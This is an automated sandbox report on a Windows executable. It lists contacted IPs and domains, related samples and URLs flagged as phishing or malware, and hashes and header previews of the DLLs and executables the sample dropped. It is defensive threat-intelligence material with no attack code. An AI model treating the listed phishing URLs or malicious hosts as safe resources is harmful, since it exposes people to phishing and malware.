                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  43.153.232.151
                  unknownJapan4249LILLY-ASUSfalse
                  159.75.57.35
                  gz.file.myqcloud.comChina
                  1257TELE2EUfalse
                  43.152.64.193
                  sgp.file.myqcloud.comJapan4249LILLY-ASUSfalse
                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1481572
                  Start date and time:2024-07-25 11:24:32 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 6m 33s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Run name:Run with higher sleep bypass
                  Number of analysed new started processes analysed:10
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:LisectAVT_2403002B_78.exe
                  Detection:MAL
                  Classification:mal56.winEXE@3/20@4/3
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 18
                  • Number of non-executed functions: 49
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 52.168.117.173
                  • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • VT rate limit hit for: LisectAVT_2403002B_78.exe
                  No simulations
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  43.153.232.151https://docs.google.com/forms/d/e/1FAIpQLSd_bMMDEWSSp-iRMafeGAWTfMTpG6IiqHpDoivX_zCH9lj_Zw/viewformGet hashmaliciousHTMLPhisherBrowse
                    https://vtcorporatelawyer-1321712386.cos.ap-singapore.myqcloud.com/vtcorporatelawyer.htmlGet hashmaliciousHTMLPhisherBrowse
                      https://kj8vfy3vivc1fhu-1320008508.cos.ap-singapore.myqcloud.com/kj8vfy3vivc1fhu.htmlGet hashmaliciousHTMLPhisherBrowse
                        159.75.57.352IVWAPeiZm.exeGet hashmaliciousGhostRatBrowse
                          #U75c5#U6bd2#U67e5#U6740#U5de5#U5177.exeGet hashmaliciousUnknownBrowse
                            43.152.64.193LisectAVT_2403002C_57.exeGet hashmaliciousUnknownBrowse
                              LisectAVT_2403002C_57.exeGet hashmaliciousUnknownBrowse
                                https://docs.google.com/presentation/d/e/2PACX-1vRohTcL0scSvPTUjrKWcVmyILi9jTVB0uhYEMgOqhUUgmUBldmrlihahC-89vk0R9QgPxfjip6DFmJL/pub?start=false&loop=false&delayms=3000Get hashmaliciousHTMLPhisherBrowse
                                  Sgrlaw Tuesday February 2024 .htmlGet hashmaliciousHTMLPhisherBrowse
                                    https://www.youtube.com/redirect?event=video_description&redir_token=QUFFLUhqbU1CcXZZMzBCNGF5bWp3dml0VXZWYzE1NjI4d3xBQ3Jtc0trTnp1VG8zTHl0MzdqYTFKSjcxOVhScGo2YS1RNzk3cmk4ZWhlWDYzSzN6dEFkRDRNZnpyVUszU2Fyd1g3OWItdWdMT09XT1ctNl9LdXVBWE5MY2ZWYjRSSEszOHMzanNETWJUbnQydV9uNjlkWDdjVQ&q=http%3A%2F%2Fkilox.online/Bigge/Bigge/Bigge#Mcarden@Bigge.Com##Get hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                      https://attachmentpresentation.w3spaces.com/Get hashmaliciousHTMLPhisherBrowse
                                        https://www.canva.com/design/DAFsQ0XaPhk/x_dxzzL9sdOp-3kjTvk60Q/view?utm_content=DAFsQ0XaPhk&utm_campaign=designshare&utm_medium=link&utm_source=publishsharelinkGet hashmaliciousUnknownBrowse
                                          https://media.xtiles.app/2d471b1aee43e8ce19f50b523d9e6439625bec4043ca3afd6447dfbc027aa04f07be0f7d8f8061646e59a6e9eaa0999eGet hashmaliciousHTMLPhisherBrowse
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            sgp.file.myqcloud.comLisectAVT_2403002C_57.exeGet hashmaliciousUnknownBrowse
                                            • 43.152.64.193
                                            LisectAVT_2403002C_57.exeGet hashmaliciousUnknownBrowse
                                            • 43.153.232.152
                                            https://docs.google.com/presentation/d/e/2PACX-1vRohTcL0scSvPTUjrKWcVmyILi9jTVB0uhYEMgOqhUUgmUBldmrlihahC-89vk0R9QgPxfjip6DFmJL/pub?start=false&loop=false&delayms=3000Get hashmaliciousHTMLPhisherBrowse
                                            • 43.152.64.193
                                            https://v02i29jwyl-1324277188.cos.ap-singapore.myqcloud.com/v02i29jwyl.htmlGet hashmaliciousHTMLPhisherBrowse
                                            • 43.153.232.152
                                            https://docs.google.com/presentation/d/e/2PACX-1vRLd0kcVFz9h2YfkJ5nqT-SOn8rPnsID4V6KoblagKxsqmWxdzqw58DZbzyFQwP58roXNGiXOHm3hC-/pub?start=false&loop=false&delayms=3000Get hashmaliciousHTMLPhisherBrowse
                                            • 43.153.232.152
                                            Complete Doc_ Notifier - ID #2378936496.emlGet hashmaliciousHTMLPhisherBrowse
                                            • 43.152.64.207
                                            Sgrlaw Tuesday February 2024 .htmlGet hashmaliciousHTMLPhisherBrowse
                                            • 43.152.64.193
                                            https://www.youtube.com/redirect?event=video_description&redir_token=QUFFLUhqbU1CcXZZMzBCNGF5bWp3dml0VXZWYzE1NjI4d3xBQ3Jtc0trTnp1VG8zTHl0MzdqYTFKSjcxOVhScGo2YS1RNzk3cmk4ZWhlWDYzSzN6dEFkRDRNZnpyVUszU2Fyd1g3OWItdWdMT09XT1ctNl9LdXVBWE5MY2ZWYjRSSEszOHMzanNETWJUbnQydV9uNjlkWDdjVQ&q=http%3A%2F%2Fkilox.online/Bigge/Bigge/Bigge#Mcarden@Bigge.Com##Get hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                            • 43.152.64.193
                                            https://www.canva.com/design/DAF8OGGfhO8/R6YCNNVrsg2_7X2EE7u58g/view?utm_c_ontent_=DAF8OGGfhO8&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousHTMLPhisherBrowse
                                            • 43.152.64.207
                                            gz.file.myqcloud.com2IVWAPeiZm.exeGet hashmaliciousGhostRatBrowse
                                            • 159.75.57.35
                                            #U75c5#U6bd2#U67e5#U6740#U5de5#U5177.exeGet hashmaliciousUnknownBrowse
                                            • 159.75.57.36
                                            #U75c5#U6bd2#U67e5#U6740#U5de5#U5177.exeGet hashmaliciousUnknownBrowse
                                            • 159.75.57.35
                                            dllhostpgd.exeGet hashmaliciousCobaltStrikeBrowse
                                            • 159.75.57.69
                                            dllhostpgd.exeGet hashmaliciousCobaltStrikeBrowse
                                            • 159.75.57.69
                                            buding.exeGet hashmaliciousUnknownBrowse
                                            • 159.75.57.69
                                            Q6UkPxz1Bk.exeGet hashmaliciousUnknownBrowse
                                            • 159.75.57.69
                                            Q6UkPxz1Bk.exeGet hashmaliciousUnknownBrowse
                                            • 159.75.57.69
                                            #U8d85#U7ea7#U6587#U672cTXT.exeGet hashmaliciousAsyncRAT, DcRat, VenomRATBrowse
                                            • 159.75.57.36
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            LILLY-ASUSLisectAVT_2403002C_3.exeGet hashmaliciousFormBookBrowse
                                            • 43.132.225.97
                                            LisectAVT_2403002C_57.exeGet hashmaliciousUnknownBrowse
                                            • 43.152.64.193
                                            LisectAVT_2403002C_57.exeGet hashmaliciousUnknownBrowse
                                            • 43.152.64.193
                                            LisectAVT_2403002C_192.exeGet hashmaliciousUnknownBrowse
                                            • 43.129.31.231
                                            LisectAVT_2403002C_194.exeGet hashmaliciousUnknownBrowse
                                            • 43.129.31.231
                                            LisectAVT_2403002C_192.exeGet hashmaliciousUnknownBrowse
                                            • 43.129.31.231
                                            LisectAVT_2403002C_194.exeGet hashmaliciousUnknownBrowse
                                            • 43.129.31.231
                                            LisectAVT_2403002B_257.exeGet hashmaliciousBdaejecBrowse
                                            • 43.132.235.4
                                            d48c236503a4d2e54e23d9ebc9aa48e86300fd24955c871a7b8792656c47fb6a.exeGet hashmaliciousBdaejecBrowse
                                            • 43.152.44.86
                                            TELE2EURx1EfzuTh3.elfGet hashmaliciousUnknownBrowse
                                            • 5.241.71.249
                                            3B4ehVz4C4.elfGet hashmaliciousMiraiBrowse
                                            • 83.185.2.111
                                            0SpHek7Jd8.elfGet hashmaliciousUnknownBrowse
                                            • 130.244.180.166
                                            Ym4vc47pgk.elfGet hashmaliciousUnknownBrowse
                                            • 90.131.48.45
                                            cJTpn6cF6x.elfGet hashmaliciousUnknownBrowse
                                            • 83.183.143.157
                                            4qOdQ3lrYx.elfGet hashmaliciousMiraiBrowse
                                            • 212.152.10.126
                                            ZPPEqPIBy7.elfGet hashmaliciousUnknownBrowse
                                            • 83.183.231.134
                                            92.249.48.47-skid.ppc-2024-07-20T09_04_20.elfGet hashmaliciousMirai, MoobotBrowse
                                            • 193.216.244.26
                                            92.249.48.47-skid.x86-2024-07-20T09_04_17.elfGet hashmaliciousMirai, MoobotBrowse
                                            • 159.76.186.9
                                            LILLY-ASUSLisectAVT_2403002C_3.exeGet hashmaliciousFormBookBrowse
                                            • 43.132.225.97
                                            LisectAVT_2403002C_57.exeGet hashmaliciousUnknownBrowse
                                            • 43.152.64.193
                                            LisectAVT_2403002C_57.exeGet hashmaliciousUnknownBrowse
                                            • 43.152.64.193
                                            LisectAVT_2403002C_192.exeGet hashmaliciousUnknownBrowse
                                            • 43.129.31.231
                                            LisectAVT_2403002C_194.exeGet hashmaliciousUnknownBrowse
                                            • 43.129.31.231
                                            LisectAVT_2403002C_192.exeGet hashmaliciousUnknownBrowse
                                            • 43.129.31.231
                                            LisectAVT_2403002C_194.exeGet hashmaliciousUnknownBrowse
                                            • 43.129.31.231
                                            LisectAVT_2403002B_257.exeGet hashmaliciousBdaejecBrowse
                                            • 43.132.235.4
                                            d48c236503a4d2e54e23d9ebc9aa48e86300fd24955c871a7b8792656c47fb6a.exeGet hashmaliciousBdaejecBrowse
                                            • 43.152.44.86
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            37f463bf4616ecd445d4a1937da06e19LisectAVT_2403002B_9.exeGet hashmaliciousBlackMoonBrowse
                                            • 43.153.232.151
                                            • 159.75.57.35
                                            • 43.152.64.193
                                            LisectAVT_2403002B_8.exeGet hashmaliciousBdaejecBrowse
                                            • 43.153.232.151
                                            • 159.75.57.35
                                            • 43.152.64.193
                                            LisectAVT_2403002B_89.exeGet hashmaliciousCobaltStrikeBrowse
                                            • 43.153.232.151
                                            • 159.75.57.35
                                            • 43.152.64.193
                                            LisectAVT_2403002B_9.exeGet hashmaliciousBlackMoonBrowse
                                            • 43.153.232.151
                                            • 159.75.57.35
                                            • 43.152.64.193
                                            LisectAVT_2403002B_89.exeGet hashmaliciousCobaltStrikeBrowse
                                            • 43.153.232.151
                                            • 159.75.57.35
                                            • 43.152.64.193
                                            LisectAVT_2403002C_129.exeGet hashmaliciousUpatreBrowse
                                            • 43.153.232.151
                                            • 159.75.57.35
                                            • 43.152.64.193
                                            SEL1685129 AMANOS.pdf.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                            • 43.153.232.151
                                            • 159.75.57.35
                                            • 43.152.64.193
                                            ESPLS-RFQ_2400282.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                            • 43.153.232.151
                                            • 159.75.57.35
                                            • 43.152.64.193
                                            ESPLS-RFQ_2400282.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                            • 43.153.232.151
                                            • 159.75.57.35
                                            • 43.152.64.193
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            C:\Program Files (x86)\Mysoftwaref\msvcp120.dll3vS3F5eukR.exeGet hashmaliciousUnknownBrowse
                                              3vS3F5eukR.exeGet hashmaliciousUnknownBrowse
                                                eWIIsxIoe5.exeGet hashmaliciousUnknownBrowse
                                                  eWIIsxIoe5.exeGet hashmaliciousUnknownBrowse
                                                    CloudInstaller.zipGet hashmaliciousUnknownBrowse
                                                      lookworldafs1244.msiGet hashmaliciousUnknownBrowse
                                                        KuaiVpn-n.msiGet hashmaliciousUnknownBrowse
                                                          lookworldafs1244.msiGet hashmaliciousUnknownBrowse
                                                            KuaiVpn-n.msiGet hashmaliciousUnknownBrowse
                                                              C:\Program Files (x86)\Mysoftwaref\cximagecrt.dllN-9hndmrcq j9uj93.msiGet hashmaliciousUnknownBrowse
                                                                Process:C:\Users\user\Desktop\LisectAVT_2403002B_78.exe
                                                                File Type:XML 1.0 document, ASCII text
                                                                Category:dropped
                                                                Size (bytes):477
                                                                Entropy (8bit):5.6505598654728155
                                                                Encrypted:false
                                                                SSDEEP:12:TM3iu5vw5puA9WZSEprCADmQfqUeb/XOaGUPUG/zHkojXbv:qV5o5pV4prCsSUeb/++UukorL
                                                                MD5:8EA4344C7054D7A48AB5394863B4CB99
                                                                SHA1:219A12BB4E04B6021C2EEAB106BF6757C549B05A
                                                                SHA-256:A878A050BF30EB7D162CF8422436AB86E7486C822FEE6F14AB3068F7475277BB
                                                                SHA-512:9A325CA255E7C7EB778FF61EA006088C817AA379B836A0D81BDE106857237B05402951B50180B27E8FFF440CB93219FCF1980EBFD37D7D16E24AF0BEFA5FC943
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:<?xml version='1.0' encoding='utf-8' ?>.<Error>..<Code>UnavailableForLegalReasons</Code>..<Message>Due to your account is arrears, it is unavailable until you recharge.</Message>..<Resource>/qd.bin</Resource>..<RequestId>NjZhMjFhMmFfYzVkMmIyMDlfOTUyY18yNGI1OWMz</RequestId>..<TraceId>OGVmYzZiMmQzYjA2OWNhODk0NTRkMTBiOWVmMDAxODc0OWRkZjk0ZDM1NmI1M2E2MTRlY2MzZDhmNmI5MWI1OTVlYmNhYjQwZWZiOTI4YWY0MTRiOWU0YzQ3ZmVhMjQ3MmIzZjU5NDVmMTI0ZDFhMTNhODBhOTVmZmJiYzEyNzA=</TraceId>.</Error>..
                                                                Process:C:\Users\user\Desktop\LisectAVT_2403002B_78.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1597304
                                                                Entropy (8bit):6.637291537967305
                                                                Encrypted:false
                                                                SSDEEP:24576:gzpjfQWnxImuy/53F9F2LZFTSnvZYfHfE0jr8HDYn8HyTdUZ8:g1zQUgVDjwHcn8STW8
                                                                MD5:66DF6F7B7A98FF750AADE522C22D239A
                                                                SHA1:F69464FE18ED03DE597BB46482AE899F43C94617
                                                                SHA-256:91E3035A01437B54ADDA33D424060C57320504E7E6A0C85DB2654815BA29C71F
                                                                SHA-512:48D4513E09EDD7F270614258B2750D5E98F0DBCE671BA41A524994E96ED3DF657FCE67545153CA32D2BF7EFCB35371CAE12C4264DF9053E4EB5E6B28014ED20E
                                                                Malicious:false
                                                                Joe Sandbox View:
                                                                • Filename: N-9hndmrcq j9uj93.msi, Detection: malicious, Browse
                                                                Reputation:low
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ .y.A.*.A.*.A.*v.V*.A.*..L*.A.*..N*.A.*..q*.A.*..p*.A.*].u*8A.*.9.*.A.*.A.**A.*].p*.A.*].M*.A.*..J*.A.*.A.*.A.*].O*.A.*Rich.A.*................PE..L....N.Z...........!.........,.......................................................C....@..............................r...........................&..x9......tu......................................@............................................text...y........................... ..`.rdata..............................@..@.data...`........,...~..............@....rsrc...............................@..@.reloc..tu.......v..................@..B........................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\LisectAVT_2403002B_78.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):38896
                                                                Entropy (8bit):6.559102503083516
                                                                Encrypted:false
                                                                SSDEEP:768:CO+/dMq5EVz8TZvpEYixxqAMxkEhpdDGPrUf2hn:fYMq5kz8ppE7XIxTMUf+
                                                                MD5:DA33AD352674B718A8B1EBBB6D77A38B
                                                                SHA1:F2EF372864D39D4C7892F0DC3325233174B791DD
                                                                SHA-256:045C585B661C21ECDE016C752143F4B358C3131CC01C12420454037AE0F02813
                                                                SHA-512:79D1132D03C4E07BC11238E1E3B32447C00048732104B26CD890B161CABA92068141A50605C4A42E9B0614139D7EC786D3B52D6E1176EF0F4C828EBB4B755F01
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........wZ...4..4..4.n...4.I.5..4.I.1..4.I.0..4.I.7..4..n5..4..5..4.d.=..4.d.4..4.d....4.....4.d.6..4.Rich..4.................PE..L....).e...........!...'.....n............... ............................................@..........................%.......&..P....@...S...........|..........T....!..p............................ ..@............ ..|............................text...x........................... ..`.rdata..<.... ......................@..@.data........0......................@....rsrc....S...@...T...&..............@..@.reloc..T............z..............@..B................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\LisectAVT_2403002B_78.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):455328
                                                                Entropy (8bit):6.698367093574994
                                                                Encrypted:false
                                                                SSDEEP:12288:uZ/8wcqw2oe+Z3VrfwfNOOoWhUgiW6QR7t5ss3Ooc8DHkC2e77/:W/8wVwHZFTwFOOos3Ooc8DHkC2e77/
                                                                MD5:FD5CABBE52272BD76007B68186EBAF00
                                                                SHA1:EFD1E306C1092C17F6944CC6BF9A1BFAD4D14613
                                                                SHA-256:87C42CA155473E4E71857D03497C8CBC28FA8FF7F2C8D72E8A1F39B71078F608
                                                                SHA-512:1563C8257D85274267089CD4AEAC0884A2A300FF17F84BDB64D567300543AA9CD57101D8408D0077B01A600DDF2E804F7890902C2590AF103D2C53FF03D9E4A5
                                                                Malicious:false
                                                                Joe Sandbox View:
                                                                • Filename: 3vS3F5eukR.exe, Detection: malicious, Browse
                                                                • Filename: 3vS3F5eukR.exe, Detection: malicious, Browse
                                                                • Filename: eWIIsxIoe5.exe, Detection: malicious, Browse
                                                                • Filename: eWIIsxIoe5.exe, Detection: malicious, Browse
                                                                • Filename: CloudInstaller.zip, Detection: malicious, Browse
                                                                • Filename: lookworldafs1244.msi, Detection: malicious, Browse
                                                                • Filename: KuaiVpn-n.msi, Detection: malicious, Browse
                                                                • Filename: lookworldafs1244.msi, Detection: malicious, Browse
                                                                • Filename: KuaiVpn-n.msi, Detection: malicious, Browse
                                                                Reputation:moderate, very likely benign file
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o...+.N+.N+.N.3wN).N+.N..Nm.aN(.Nm.cN#.Nm.]N..Nm.\Ne.Nm.YN-.Nm.`N*.Nm.gN*.Nm.bN*.NRich+.N........................PE..L....|OR.........."!.........................0.......................................x....@..........................W..L...<...<........................>.......D...................................K..@...............<............................text...<........................... ..`.data....^...0...0... ..............@....idata...............P..............@..@.rsrc................j..............@..@.reloc...D.......F...n..............@..B........................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\LisectAVT_2403002B_78.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):446840
                                                                Entropy (8bit):6.690279428020546
                                                                Encrypted:false
                                                                SSDEEP:12288:5mtyWf0sTWRzbpT/tD5YpsGx30h7whUgiW6QR7t5s03Ooc8dHkC2es98R:A0HsTWRzbp5D5YpsM3A7v03Ooc8dHkCh
                                                                MD5:C766CA0482DFE588576074B9ED467E38
                                                                SHA1:5AC975CCCE81399218AB0DD27A3EFFC5B702005E
                                                                SHA-256:85AA8C8AB4CBF1FF9AE5C7BDE1BF6DA2E18A570E36E2D870B88536B8658C5BA8
                                                                SHA-512:EE36BC949D627B06F11725117D568F9CF1A4D345A939D9B4C46040E96C84159FA741637EF3D73ED2D01DF988DE59A573C3574308731402EB52BAE2329D7BDDAC
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O.$...w...w...w.\.v...w.V@w...w..v...w...w...w..v...w..v...w..vD..w..v...w.,w...w..v...wRich...w........................PE..L....4.w.........."!...&.....z...............0.......................................=....@A.........................S......8c..........................xO.......4...U..T...........................8U..@............`..0............................text...b........................... ..`.data....&...0......................@....idata..0....`.......0..............@..@.rsrc................H..............@..@.reloc...4.......6...L..............@..B........................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\LisectAVT_2403002B_78.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):970912
                                                                Entropy (8bit):6.9649735952029515
                                                                Encrypted:false
                                                                SSDEEP:12288:LBmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJQV:dmFyjLF847eiWWcoGZVOIxh/WxIAIbGV
                                                                MD5:034CCADC1C073E4216E9466B720F9849
                                                                SHA1:F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
                                                                SHA-256:86E39B5995AF0E042FCDAA85FE2AEFD7C9DDC7AD65E6327BD5E7058BC3AB615F
                                                                SHA-512:5F11EF92D936669EE834A5CEF5C7D0E7703BF05D03DC4F09B9DCFE048D7D5ADFAAB6A9C7F42E8080A5E9AAD44A35F39F3940D5CCA20623D9CAFE373C635570F7
                                                                Malicious:false
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S9...XlA.XlA.XlA..A.XlA.XmA.XlAQ..A.ZlAQ..AvXlAQ..A!XlAQ..A.XlAQ..A.XlAQ..A.XlAQ..A.XlARich.XlA........PE..L....|OR.........."!................D............................................... .....@.........................`........R..(....p...................>......d]..@...8...........................H...@............P...............................text............................... ..`.data...4e.......V..................@....idata.......P......................@....rsrc........p.......0..............@..@.reloc..d].......^...4..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\LisectAVT_2403002B_78.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1659120
                                                                Entropy (8bit):6.598425597611016
                                                                Encrypted:false
                                                                SSDEEP:24576:aDPgc5j2oEEiq59Ry8naimjP/RPszWxkk9xx5x/luqxni0DRk70DRkctvdET5tG:1aiqNxaimjP/NNVrx5x/oek5tG
                                                                MD5:5F29A3A467D2B501FFDAC96E72665B83
                                                                SHA1:B60A014B8E99E331187723B93365E7FC76E0AB51
                                                                SHA-256:D66DD58752E43A523759327307490D62C56A9C8F7A04CE7B8BF3F2B5C1ACEAC9
                                                                SHA-512:1D3D6A8E85773079DDBB971E70AEC6A3F36A33FA582F65FA4B6E40AFDFEB35FDE87D568B268C3F54A802F8F352A09C5888E46F69A8B33166CAF7B94576E72DAB
                                                                Malicious:false
                                                                Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.........[............70?.......'.............to).......%.............to6.....to(.....to3.......%......................................#.......o.......&.....Rich....................PE..L....f[d.....................X....................@..........................p......H.....@..................................v...........................R...`..t.......8...............................@...............|............................text............................... ..`.rdata..............................@..@.data...............................@....rsrc................R..............@..@.reloc..t....`......................@..B........................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\LisectAVT_2403002B_78.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):91104
                                                                Entropy (8bit):6.919609919273454
                                                                Encrypted:false
                                                                SSDEEP:1536:wd5wd+ywOpmlhcsrG4ckZEzH3qDLItnTwfVkC2KecbGJ13yd+zTNFZFzK:wdJywOpmlPrHI6D+nTwvlecbG/3y8XG
                                                                MD5:9C133B18FA9ED96E1AEB2DA66E4A4F2B
                                                                SHA1:238D34DBD80501B580587E330D4405505D5E80F2
                                                                SHA-256:C7D9DFDDBE68CF7C6F0B595690E31A26DF4780F465D2B90B5F400F2D8D788512
                                                                SHA-512:D2D588F9940E7E623022ADEBEBDC5AF68421A8C1024177189D11DF45481D7BFED16400958E67454C84BA97F0020DA559A8DAE2EC41950DC07E629B0FD4752E2F
                                                                Malicious:false
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................2........I..............o.......o.......o.......o.......o%......o......Rich............PE..L....s............"!...&............P........................................P...........@A........................@........ .......0...................O...@.......$..T............................#..@............ ...............................text...T........................... ..`.data...d...........................@....idata....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):65536
                                                                Entropy (8bit):1.0156307321504288
                                                                Encrypted:false
                                                                SSDEEP:192:2WgQVu0XLc0BU/wjHzn/zuiF4Z24IO8D:vg0XLXBU/wjjzuiF4Y4IO8D
                                                                MD5:1D650419E28B25EC0E4145B340C031AE
                                                                SHA1:4C0D442C4FE1430AC5D29E2354A6049BAF895F71
                                                                SHA-256:FCD4B949DE09FBBAF5227E5FB2306F0999C6C6F1017A81B0DEB6790D64C3ABAF
                                                                SHA-512:93E112AF5A65EFB5BF27782A8C8465500F0585636EE6732368A714F4B08E9A174BB25A62A131EC7C90B2DBFF9F83249C8F4FD75D31E3E4C4E180FC36C9412967
                                                                Malicious:false
                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.7.3.1.6.2.4.0.6.9.7.7.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.7.3.1.6.2.8.4.4.4.5.9.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.f.e.7.e.7.5.f.-.a.8.f.7.-.4.b.6.2.-.a.3.e.1.-.c.7.b.7.e.2.2.e.6.2.f.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.f.a.6.7.9.f.a.-.1.8.f.c.-.4.8.e.1.-.a.0.9.2.-.8.4.e.2.9.5.0.4.a.7.a.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.L.i.s.e.c.t.A.V.T._.2.4.0.3.0.0.2.B._.7.8...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.c.0.-.0.0.0.1.-.0.0.1.5.-.6.6.7.6.-.e.4.9.6.7.4.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.d.9.6.a.3.e.1.1.8.c.a.a.9.d.f.5.f.3.a.e.d.1.4.0.d.8.0.0.8.0.0.0.0.0.0.0.4.0.8.!.0.0.0.0.4.3.4.a.0.f.5.4.5.d.0.a.a.a.f.a.f.c.1.b.f.5.3.6.6.f.9.8.1.8.7.3.5.6.e.3.7.a.3.a.!.L.i.s.e.c.t.A.V.T._.2.4.0.3.
                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                File Type:Mini DuMP crash report, 14 streams, Thu Jul 25 09:26:02 2024, 0x1205a4 type
                                                                Category:dropped
                                                                Size (bytes):133564
                                                                Entropy (8bit):1.886789540130812
                                                                Encrypted:false
                                                                SSDEEP:384:AIaCZFC5kQhy7xGkN45lpRYi4Cz1RxETyHVvKJ5jAkEXNkObyYhGRj:sk1QhygkN45C4bWK1KP9cqbt
                                                                MD5:08EA73F567A19F381C1E82356C81964D
                                                                SHA1:A3A4FF7E6CD0DA21620B1132B780BE61E17C5318
                                                                SHA-256:664E8F43C705162C092C4699BE3B0F5724CBECFBF19B86F5CE8777B7065C4B59
                                                                SHA-512:21D0B7298A7CAAA9F94D19ED5FE4BC3BDC81138C4D8249D32016829369D2C202425E08176D0ED255D6CA57A15DD34910BF5A73258CBB17F116B95F4A0B5B64FF
                                                                Malicious:false
                                                                Preview:MDMP..a..... .......*..f............D...........|...L...........lO..........T.......8...........T...........0N...............!...........#..............................................................................eJ......L$......GenuineIntel............T..............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\SysWOW64\WerFault.exe
